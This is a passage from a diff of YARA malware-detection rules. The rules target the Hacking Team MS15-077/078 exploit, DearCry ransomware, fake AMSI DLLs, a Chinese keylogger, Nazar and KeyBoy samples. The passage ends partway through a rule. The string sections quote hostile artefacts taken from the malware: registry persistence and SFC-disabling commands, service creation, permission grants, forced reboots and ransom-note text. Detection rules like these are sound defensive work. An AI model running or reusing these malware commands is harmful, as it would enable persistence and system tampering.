-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3076-L3090"
+		description = "MS15-078 / MS15-077 exploit - generic signature"
+		author = "Florian Roth (Nextron Systems)"
+		id = "57f6db11-9d93-53fd-ab68-c6c3eadae2da"
+		date = "2015-07-21"
+		modified = "2023-12-05"
+		reference = "https://code.google.com/p/google-security-research/issues/detail?id=473&can=1&start=200"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_cve_2015_2426.yar#L10-L36"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "36430e0c2874aed1d86e061f9413c16bbb4527d0d04dfb8993214920083cc30a"
+		logic_hash = "354219a1ed88c891c64513a057266199919406309460d92792a4be509f9580a1"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "18e3e840a5e5b75747d6b961fca66a670e3faef252aaa416a88488967b47ac1c"
+		hash2 = "0b5dc030e73074b18b1959d1cf7177ff510dbc2a0ec2b8bb927936f59eb3d14d"
+		hash3 = "fc609adef44b5c64de029b2b2cff22a6f36b6bdf9463c1bd320a522ed39de5d9"
+		hash4 = "ad6bb982a1ecfe080baf0a2b27950f989c107949b1cf02b6e0907f1a568ece15"
 
 	strings:
-		$typelibguid0lo = "6aeb5004-6093-4c23-aeae-911d64cacc58" ascii wide
-		$typelibguid1lo = "1bf9c10f-6f89-4520-9d2e-aaf17d17ba5e" ascii wide
+		$s1 = "GDI32.DLL" fullword ascii
+		$s2 = "atmfd.dll" fullword wide
+		$s3 = "AddFontMemResourceEx" fullword ascii
+		$s4 = "NamedEscape" fullword ascii
+		$s5 = "CreateBitmap" fullword ascii
+		$s6 = "DeleteObject" fullword ascii
+		$op0 = { 83 45 e8 01 eb 07 c7 45 e8 }
+		$op1 = { 8d 85 24 42 fb ff 89 04 24 e8 80 22 00 00 c7 45 }
+		$op2 = { eb 54 8b 15 6c 00 4c 00 8d 85 24 42 fb ff 89 44 }
+		$op3 = { 64 00 88 ff 84 03 70 03 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 5 of ( $s* ) or 3 of ( $op* )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Memscan : FILE
+rule SIGNATURE_BASE_Exploit_MS15_077_078_Hackingteam : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "35175fe1-a583-50d1-8b0c-71f19b898817"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/nccgroup/memscan"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3092-L3105"
+		description = "MS15-078 / MS15-077 exploit - Hacking Team code"
+		author = "Florian Roth (Nextron Systems)"
+		id = "3bf40dec-c46e-5054-a98e-602049cb1824"
+		date = "2015-07-21"
+		modified = "2023-12-05"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_cve_2015_2426.yar#L38-L57"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9885512853fc46cc680b70ab26b40d4e51393b1f0b744565d4a4aa063cb78440"
+		logic_hash = "c94582629e555c9fd0b29302720078a7eb47d3013d0c1b5edd4e060c2062fa92"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "ad6bb982a1ecfe080baf0a2b27950f989c107949b1cf02b6e0907f1a568ece15"
+		hash2 = "fc609adef44b5c64de029b2b2cff22a6f36b6bdf9463c1bd320a522ed39de5d9"
 
 	strings:
-		$typelibguid0lo = "79462f87-8418-4834-9356-8c11e44ce189" ascii wide
+		$s1 = "\\SystemRoot\\system32\\CI.dll" ascii
+		$s2 = "\\sysnative\\CI.dll" ascii
+		$s3 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" fullword ascii
+		$s4 = "CRTDLL.DLL" fullword ascii
+		$s5 = "\\sysnative" ascii
+		$s6 = "InternetOpenA coolio, trying open %s" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 2500KB and 5 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpstay : FILE
+rule SIGNATURE_BASE_MAL_RANSOM_Crime_Dearcry_Mar2021_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "e5bde5a9-8e09-59ce-ad01-e29836813cf8"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/0xthirteen/SharpStay"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3107-L3120"
+		description = "Triggers on strings of known DearCry samples"
+		author = "Nils Kuhnert"
+		id = "d9714502-f1ea-5fe8-b0ac-1f7a9a30d8f5"
+		date = "2021-03-12"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/phillip_misner/status/1370197696280027136"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_dearcry_ransom.yar#L1-L27"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "91fe0fd4bea7678df8bdb0948a0952e01b6588e07836d535f5aaa3700294d838"
+		logic_hash = "e55507475888087c84f9624f82516e8a40aaf59bf2fbea72129a1dd134b28110"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "2b9838da7edb0decd32b086e47a31e8f5733b5981ad8247a2f9508e232589bff"
+		hash2 = "e044d9f2d0f1260c3f4a543a1e67f33fcac265be114a1b135fd575b860d2b8c6"
+		hash3 = "feb3e6d30ba573ba23f3bd1291ca173b7879706d1fe039c34d53a4fdcdf33ede"
 
 	strings:
-		$typelibguid0lo = "2963c954-7b1e-47f5-b4fa-2fc1f0d56aea" ascii wide
+		$x1 = ".TIF .TIFF .PDF .XLS .XLSX .XLTM .PS .PPS .PPT .PPTX .DOC .DOCX .LOG .MSG .RTF .TEX .TXT .CAD .WPS .EML .INI .CSS .HTM .HTML  .XHTML .JS .JSP .PHP .KEYCHAIN .PEM .SQL .APK .APP .BAT .CGI .ASPX .CER .CFM .C .CPP .GO .CONFIG .PL .PY .DWG .XML .JPG .BMP .PNG .EXE .DLL .CAD .AVI .H.CSV .DAT .ISO .PST .PGD  .7Z .RAR .ZIP .ZIPX .TAR .PDB .BIN .DB .MDB .MDF .BAK .LOG .EDB .STM .DBF .ORA .GPG .EDB .MFS" ascii
+		$s1 = "create rsa error" ascii fullword
+		$s2 = "DEARCRY!" ascii fullword
+		$s4 = "/readme.txt" ascii fullword
+		$s5 = "msupdate" ascii fullword
+		$s6 = "Your file has been encrypted!" ascii fullword
+		$s7 = "%c:\\%s" ascii fullword
+		$s8 = "C:\\Users\\john\\" ascii
+		$s9 = "EncryptFile.exe.pdb" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize > 1MB and filesize < 2MB and ( 1 of ( $x* ) or 3 of them ) or 5 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharplocker : FILE
+rule SIGNATURE_BASE_MAL_CRIME_RANSOM_Dearcry_Mar21_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "9525422a-d670-5475-abdc-b7ecd1ab9943"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/Pickfordmatt/SharpLocker"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3122-L3135"
+		description = "Detects DearCry Ransomware affecting Exchange servers"
+		author = "Florian Roth (Nextron Systems)"
+		id = "96cd2fe8-8bb9-5a3b-9bf1-c63a1148a817"
+		date = "2021-03-12"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/phillip_misner/status/1370197696280027136"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_dearcry_ransom.yar#L29-L53"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "030b7a87042ce70c9de6031d0e03f07e508563f4ca2da4d6dc80e87f8bf483de"
+		logic_hash = "c4af7c29e917078f8658aca68ec95f8a03934f42c81fdd421639437e24f304bc"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "2b9838da7edb0decd32b086e47a31e8f5733b5981ad8247a2f9508e232589bff"
+		hash2 = "e044d9f2d0f1260c3f4a543a1e67f33fcac265be114a1b135fd575b860d2b8c6"
+		hash3 = "feb3e6d30ba573ba23f3bd1291ca173b7879706d1fe039c34d53a4fdcdf33ede"
 
 	strings:
-		$typelibguid0lo = "a6f8500f-68bc-4efc-962a-6c6e68d893af" ascii wide
+		$s1 = "dear!!!" ascii fullword
+		$s2 = "EncryptFile.exe.pdb" ascii fullword
+		$s3 = "/readme.txt" ascii fullword
+		$s4 = "C:\\Users\\john\\" ascii
+		$s5 = "And please send me the following hash!" ascii fullword
+		$op1 = { 68 e0 30 52 00 6a 41 68 a5 00 00 00 6a 22 e8 81 d0 f8 ff 83 c4 14 33 c0 5e }
+		$op2 = { 68 78 6a 50 00 6a 65 6a 74 6a 10 e8 d9 20 fd ff 83 c4 14 33 c0 5e }
+		$op3 = { 31 40 00 13 31 40 00 a4 31 40 00 41 32 40 00 5f 33 40 00 e5 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 4000KB and 3 of them or 5 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sauroneye : FILE
+
+rule SIGNATURE_BASE_SUSP_Fake_AMSI_DLL_Jun23_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "3b624dde-a63e-58ac-a4db-af931f1d8553"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/vivami/SauronEye"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3137-L3151"
+		description = "Detects an amsi.dll that has the same exports as the legitimate one but very different contents or file sizes"
+		author = "Florian Roth"
+		id = "b12df9de-ecfb-562b-b599-87fa786a33bc"
+		date = "2023-06-07"
+		modified = "2023-06-12"
+		reference = "https://twitter.com/eversinc33/status/1666121784192581633?s=20"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_fake_amsi_dll.yar#L3-L35"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "feeda6aec173cb13209559dc3a156bdc3d4be6e14cbe52ffb2e1bb7bf652441a"
-		score = 75
+		logic_hash = "ec3db233ab22144bc65614b45bb894a7ea5a4fd40ccb603e6e52cc1b9ff8805b"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "0f43043d-8957-4ade-a0f4-25c1122e8118" ascii wide
-		$typelibguid1lo = "086bf0ca-f1e4-4e8f-9040-a8c37a49fa26" ascii wide
+		$a1 = "Microsoft.Antimalware.Scan.Interface" ascii
+		$a2 = "Amsi.pdb" ascii fullword
+		$a3 = "api-ms-win-core-sysinfo-" ascii
+		$a4 = "Software\\Microsoft\\AMSI\\Providers" wide
+		$a5 = "AmsiAntimalware@" ascii
+		$a6 = "AMSI UAC Scan" ascii
+		$fp1 = "Wine builtin DLL"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and ( pe.exports ( "AmsiInitialize" ) and pe.exports ( "AmsiScanString" ) ) and ( filesize > 200KB or filesize < 35KB or not 4 of ( $a* ) ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sitrep : FILE
+rule SIGNATURE_BASE_Keylogger_CN_APT : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "5f2ac63e-4be1-520c-82b1-1957027a63e2"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/mdsecactivebreach/sitrep"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3153-L3166"
+		description = "Keylogger - generic rule for a Chinese variant"
+		author = "Florian Roth (Nextron Systems)"
+		id = "7be0b175-05a4-5725-ba21-9438c0fcd740"
+		date = "2016-03-07"
+		modified = "2023-12-05"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_keylogger_cn.yar#L8-L35"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "113e3a23c3f8258707f9d0c1baa143b3599e5da10928f275fca908c3a57f76e8"
+		hash = "3efb3b5be39489f19d83af869f11a8ef8e9a09c3c7c0ad84da31fc45afcf06e7"
+		logic_hash = "a5330d15ad7199212cec44ade401c224c40a468650abbc7bf282b26a21cdc22b"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "12963497-988f-46c0-9212-28b4b2b1831b" ascii wide
+		$x1 = "Mozilla/4.0 (compatible; MSIE6.0;Windows NT 5.1)" fullword ascii
+		$x2 = "attrib -s -h -r c:\\ntldr" fullword ascii
+		$x3 = "%sWindows NT %d.%d" fullword ascii
+		$x4 = "Referer: http://%s/%s.aspx?n=" fullword ascii
+		$s1 = "\\cmd.exe /c \"systeminfo.exe >> " fullword ascii
+		$s2 = "%s\\cmd.exe /c %s >> \"%s\"" fullword ascii
+		$s3 = "shutdown.exe -r -t 0" fullword ascii
+		$s4 = "dir \"%SystemDrive%\\\" /s /a" fullword ascii
+		$s5 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;" fullword ascii
+		$s6 = "http_s.exe" fullword ascii
+		$s7 = "User Agent\\Post Platform\\" ascii
+		$s8 = "desktop.tmp" fullword ascii
+		$s9 = "\\support.icw" ascii
+		$s10 = "agc.tmp" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of ( $x* ) ) or 3 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpclipboard : FILE
+rule SIGNATURE_BASE_APT_Nazar_Svchost_Commands
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "fd1b7786-8853-5858-ab03-da350e44f738"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/slyd0g/SharpClipboard"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3168-L3181"
+		description = "Detects Nazar's svchost based on supported commands"
+		author = "Itay Cohen"
+		id = "3e02381d-de03-50c8-8bde-2974ee96b7c1"
+		date = "2020-04-26"
+		modified = "2023-12-05"
+		reference = "https://www.epicturla.com/blog/the-lost-nazar"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nazar.yar#L1-L18"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5070ae56bb7f5df31e915104ce42e18dbf86b93a327c49dabddcfbd141d468ac"
+		logic_hash = "c71e8a3b2d69c51ed3f822f62b90906fc0a21d32f1f1850cdef71c335964f9b1"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
+		hash1 = "2fe9b76496a9480273357b6d35c012809bfa3ae8976813a7f5f4959402e3fbb6"
+		hash2 = "be624acab7dfe6282bbb32b41b10a98b6189ab3a8d9520e7447214a7e5c27728"
 
 	strings:
-		$typelibguid0lo = "97484211-4726-4129-86aa-ae01d17690be" ascii wide
+		$str1 = { 33 31 34 00 36 36 36 00 33 31 33 00 }
+		$str2 = { 33 31 32 00 33 31 35 00 35 35 35 00 }
+		$str3 = { 39 39 39 00 35 39 39 00 34 39 39 00 }
+		$str4 = { 32 30 39 00 32 30 31 00 32 30 30 00 }
+		$str5 = { 31 39 39 00 31 31 39 00 31 38 39 00 31 33 39 00 33 31 31 00 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		4 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpcookiemonster : FILE
+
+rule SIGNATURE_BASE_Keyboys_Malware_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "87be6949-f4f5-5a5a-b804-c627ed0f4355"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/m0rv4i/SharpCookieMonster"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3183-L3196"
+		description = "Detects Keyboys malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "4e334f62-6ffc-55c3-bcbe-ff4a80fb007d"
+		date = "2017-11-02"
+		modified = "2023-12-05"
+		reference = "http://www.pwc.co.uk/issues/cyber-security-data-privacy/research/the-keyboys-are-back-in-town.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_keyboys.yar#L13-L48"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1aac6d1c4e1d28805ec7e61ee00d105795ce355dce6238981b22b6f7cf9d4e29"
+		logic_hash = "78fb48c4b3e09f0d55ca6049601ea62dd526167481725b48de6624bb27fb943b"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "1d716cee0f318ee14d7c3b946a4626a1afe6bb47f69668065e00e099be362e22"
+		hash2 = "a6e9951583073ab2598680b17b8b99bab280d6dca86906243bafaf3febdf1565"
+		hash3 = "34f740e5d845710ede1d942560f503e117600bcc7c5c17e03c09bfc66556196c"
+		hash4 = "750f4a9ae44438bf053ffb344b959000ea624d1964306e4b3806250f4de94bc8"
+		hash5 = "fc84856814307a475300d2a44e8d15635dedd02dc09a088a47d1db03bc309925"
+		hash6 = "0f9a7efcd3a2b1441834dae7b43cd8d48b4fc1daeb2c081f908ac5a1369de753"
 
 	strings:
-		$typelibguid0lo = "566c5556-1204-4db9-9dc8-a24091baaa8e" ascii wide
+		$x1 = "reg add HKLM\\%s\\Parameters /v ServiceDll /t REG_EXPAND_SZ /d \"%s\" /f" fullword ascii
+		$x3 = "Internet using \\svchost.exe -k  -n 3" fullword ascii
+		$x4 = "reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /v SFCDisable /t REG_DWORD /d 4 /f" fullword ascii
+		$s1 = "sc create %s binpath= \"%s\" Type= share Start= auto DisplayName= \"%s\"" fullword ascii
+		$s2 = "ExecCmd:%s" fullword ascii
+		$s3 = "szCommand : %s" fullword ascii
+		$s4 = "Current user is a member of the %s\\%s group" fullword ascii
+		$s5 = "icacls %s /grant administrators:F" fullword ascii
+		$s6 = "Ping 127.0.0.1 goto Repeat" fullword ascii
+		$s7 = "Start MoveFile %s -> %s" fullword ascii
+		$s8 = "move %s\\dllcache%s %s\\dllcache\\%s" fullword ascii
+		$s9 = "%s\\cmd.exe /c \"%s\"" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( pe.imphash ( ) == "68f7eced34c46808756db4b0c45fb589" or ( pe.exports ( "Insys" ) and pe.exports ( "Inuser" ) and pe.exports ( "SSSS" ) ) or 1 of ( $x* ) or 4 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_P0Wnedshell : FILE
+rule SIGNATURE_BASE_Keyboy_Installclient : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "390b94d1-dda9-5a85-80ae-c79a3f7b0b9d"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/Cn33liz/p0wnedShell"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3198-L3211"
+		description = "Detects KeyBoy InstallClient"
+		author = "Markus Neis, Florian Roth"
+		id = "d1359f35-d6cd-502b-8cf7-6215bf5e62ba"
+		date = "2018-03-26"
+		modified = "2023-12-05"
+		reference = "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_keyboys.yar#L52-L73"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7c6d8dbcd1ff31a9b34c36b4db2867f0b9e3fac98c7039d2a51bfe5a45afcc71"
+		logic_hash = "701b87785562dc391191b1e59573c6027b27c4fffe1c9155a82114521c85bc59"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "85d32cb3ae046a38254b953a00b37bb87047ec435edb0ce359a867447ee30f8b"
+		hash2 = "b0f120b11f727f197353bc2c98d606ed08a06f14a1c012d3db6fe0a812df528a"
+		hash1 = "d65f809f7684b28a6fa2d9397582f350318027999be3acf1241ff44d4df36a3a"
 
 	strings:
-		$typelibguid0lo = "2e9b1462-f47c-48ca-9d85-004493892381" ascii wide
+		$x1 = "egsvr32.exe \"/u bitsadmin /canceft\\windows\\currebitsadmin" ascii
+		$x2 = "/addfibitsadmin /Resumbitsadmin /SetNosoftware\\microsotifyCmdLine " ascii
+		$x3 = "D:\\Work\\Project\\VS\\house\\Apple\\" ascii
+		$x4 = "Bj+I11T6z9HFMG5Z5FMT/u62z9zw8FyWV0xrcK7HcYXkiqnAy5tc/iJuKtwM8CT3sFNuQu8xDZQGSR6D8/Bc/Dpuz8gMJFz+IrYqNAzwuPIitg==" fullword ascii
+		$x5 = "szCmd1:%s" fullword ascii
+		$s1 = "cmd.exe /c \"%s\"" fullword ascii
+		$s4 = "rundll32.exe %s Main" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( 1 of ( $x* ) or 2 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpmove : FILE
+rule SIGNATURE_BASE_Keyboy_Wab32Res : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "e52392f9-614c-596e-8efd-aa0a2fa44e60"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/0xthirteen/SharpMove"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3213-L3226"
+		description = "Detects KeyBoy Loader wab32res.dll"
+		author = "Markus Neis, Florian Roth"
+		id = "0e4045a7-1c45-5043-9e10-e969219b67f8"
+		date = "2018-03-26"
+		modified = "2023-12-05"
+		reference = "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_keyboys.yar#L75-L96"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4980a9b197479b2514e12b78aa5a3bf9825772f8578d3abd219607e39af7e470"
+		logic_hash = "5e23bfeed0587ac69527234dd3f8b4f8c5628128ab667af7b99c4d75ca99459b"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "02281e26e89b61d84e2df66a0eeb729c5babd94607b1422505cd388843dd5456"
+		hash2 = "fb9c9cbf6925de8c7b6ce8e7a8d5290e628be0b82a58f3e968426c0f734f38f6"
 
 	strings:
-		$typelibguid0lo = "8bf82bbe-909c-4777-a2fc-ea7c070ff43e" ascii wide
+		$x1 = "B4490-2314-55C1- /Processid:{321bitsadmin /canceft\\windows\\curresoftware\\microso" fullword ascii
+		$x2 = "D:\\Work\\VS\\House\\TSSL\\TSSL\\TClient" ascii
+		$x3 = "\\Release\\FakeRun.pdb" ascii
+		$x4 = "FakeRun.dll" fullword ascii
+		$s1 = "cmd.exe /c \"%s\"" fullword ascii
+		$s2 = "CreateProcess failed (%d)" fullword ascii
+		$s3 = "CreateProcess %s " fullword ascii
+		$s4 = "FindResource %s error " fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 1 of ( $x* ) or 4 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_C_Sharp_R_A_T_Client : FILE
+
+rule SIGNATURE_BASE_Keyboy_Rasauto : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "f5df8257-d202-58e3-9c4a-1dfc9dd52f2a"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/AdvancedHacker101/C-Sharp-R.A.T-Client"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3228-L3241"
+		description = "Detects KeyBoy ServiceClient"
+		author = "Markus Neis, Florian Roth"
+		id = "b6c72a91-fda1-5f40-804f-896b25a8813f"
+		date = "2018-03-26"
+		modified = "2023-12-05"
+		reference = "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_keyboys.yar#L98-L126"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a090996b8453fb41483888f433da57340a6509221439ffd8f17e546424686c55"
+		logic_hash = "87529000522d5fad4346a0228c96d3adf122587d91b0cff083948787e53cc024"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "49df4fec76a0ffaee5e4d933a734126c1a7b32d1c9cb5ab22a868e8bfc653245"
 
 	strings:
-		$typelibguid0lo = "6d9e8852-e86c-4e36-9cb4-b3c3853ed6b8" ascii wide
+		$x1 = "rundll32.exe %s SSSS & exit" fullword ascii
+		$x2 = "D:\\Work\\Project\\VS\\HSSL\\HSSL_Unicode _2\\Release\\ServiceClient.pdb" fullword ascii
+		$s1 = "cmd.exe /c \"%s\"" fullword ascii
+		$s2 = "CreateProcess failed (%d)" fullword ascii
+		$s3 = "ServiceClient.dll" fullword ascii
+		$s4 = "NtWow64QueryInformationProcess64 failed" fullword ascii
+		$s5 = "pid:%d CmdLine:%S" fullword ascii
